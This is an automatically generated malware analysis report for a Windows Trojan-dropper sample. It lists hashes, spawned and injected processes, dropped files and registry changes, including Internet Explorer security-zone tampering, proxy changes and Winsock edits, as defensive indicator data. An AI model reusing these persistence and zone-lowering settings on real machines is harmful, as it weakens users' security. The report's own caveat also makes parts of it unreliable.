Trojan.Win32.Sasfis_416fdd6af6

by malwarelabrobot on May 6th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Exetemp.a (Kaspersky), Trojan.Generic.1630494 (B) (Emsisoft), Trojan.Generic.1630494 (AdAware), Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 416fdd6af6fefbc60fa55fd21e249d36
SHA1: 41a67db370b029d8ac6b7fc7e15e95884e8d0dfc
SHA256: 599e0d9dbb34ff79fe37ef23f8ee90947418a1c9e4539d0eb54dd5a1a1b10f08
SSDeep: 24576:nS4hIC6wCINBMChyMfcOswCINBMiPp70JZM9Xuqb:S4hI1wCqvuwCMGoXp
Size: 802816 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Piriform Ltd
Created at: 2009-03-13 07:28:29
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

EXE_temp1.EXE:308
shock.exe:3516
taskkill.exe:1700
EXE_temp4.EXE:1516
ping.exe:1580
ping.exe:1416
svchots.exe:3760
EXE_temp2.exe:1176
huodongtongzhi.exe:1032
netsh.exe:3916
MiniIE.exe:3436
qtool.exe:3460
EXE_temp0.exe:980
wpzir.exe:3300
%original file name%.exe:1040

The Trojan injects its code into the following process(es):

acsvc.exe:2168
dsau.exe:3672
objs.exe:3332
EXE_temp3.exe:816
Explorer.EXE:1752

File activity

The process EXE_temp1.EXE:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (0 bytes)

The process shock.exe:3516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
%WinDir%\JMt\sys32\shock.dll (845 bytes)

The Trojan deletes the following file(s):

%WinDir%\JMt\sys32\shock_new.dat0 (0 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (0 bytes)

The process EXE_temp4.EXE:1516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (0 bytes)

The process dsau.exe:3672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)

The process objs.exe:3332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (0 bytes)

The process svchots.exe:3760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\win32\DPro.sys (784 bytes)
%WinDir%\JMt\win32\reTcp.sys (196 bytes)
%WinDir%\JMt\win32\config.ini (46 bytes)
%WinDir%\JMt\win32\rename.exe (5480 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\_desktop.ie6[2].css (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\_desktop[2].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ya[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

The process EXE_temp3.exe:816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
%WinDir%\share\kbdf.dat (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
%Documents and Settings%\%current user%\Desktop\Ê·ÉÏ×î¾¢±¬ÓÎÏ·.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
%WinDir%\share\ico.dll (129 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
%System%\DqKgbb.dll (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
%Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎÏ·.lnk (1 bytes)
%WinDir%\share\rsvp\objs.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)

The process EXE_temp0.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\wpzir.exe (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
%WinDir%\JMt\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\JMt\win32\svchots.txt (70868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
%WinDir%\JMt\sys32\shock.txt (18796 bytes)
%WinDir%\JMt\sys32\whitelist.dat (2 bytes)
%WinDir%\JMt\sys32\qtool.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
%WinDir%\JMt\First.txt (6988 bytes)
%WinDir%\JMt\flist.bin (620 bytes)
%WinDir%\JMt\sys32\shock.exe (111 bytes)
%WinDir%\JMt\sys32\qtool.txt (26868 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\JMt\win32\svchots.exe (1695 bytes)
%WinDir%\JMt\MiniIE.txt (46228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
%WinDir%\JMt\MiniIE.exe (272 bytes)

The process %original file name%.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)

Registry activity

The process EXE_temp1.EXE:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 B1 8E 83 03 EA B0 A9 40 2D 40 80 F2 38 45 CE"

The process acsvc.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D4 A2 C7 44 4E 3A 95 23 39 19 9A 8C 1F 71 56"

The process shock.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 8D 27 10 3A D1 0A 9E 75 2C 67 9B C0 85 4E 12"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"

[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"

[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\JMt\sys32\"

The process taskkill.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F2 29 83 26 3E D9 3A D8 57 28 9C 5D DF 6D 16"

The process EXE_temp4.EXE:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 46 00 20 C6 30 FF 68 8D 7C 6C 4C C4 98 CF 4A"

The process ping.exe:1580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 56 22 5A 93 95 6F 20 42 74 37 F4 F1 21 18 88"

The process ping.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 B7 5D B6 17 80 23 9B 87 71 D4 34 94 5B 39 9E"

The process dsau.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 92 00 A7 B7 49 39 EA 6E 35 EC 86 4B 06 44 38"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process objs.exe:3332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 DD A1 69 1E 03 0A F6 86 B4 8D E7 48 93 86 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process svchots.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\JMt\win32\rename.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4E 79 67 40 E8 4D C6 21 BD 03 61 D7 2D B9 1C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process EXE_temp2.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 4B 50 9D 69 C3 68 4B 87 05 F1 33 7A D0 FE 69"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE -nohome"

The process huodongtongzhi.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 4A 3F 34 3C F2 5F C9 19 43 A8 20 AA EC 77 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process netsh.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 1.1 Provider Data" = "0E 10 00 00 11 00 00 00 14 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
"WinSock 2.0 Provider ID" = "A0 1A 0F E7 8B AB CF 11 8C A3 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

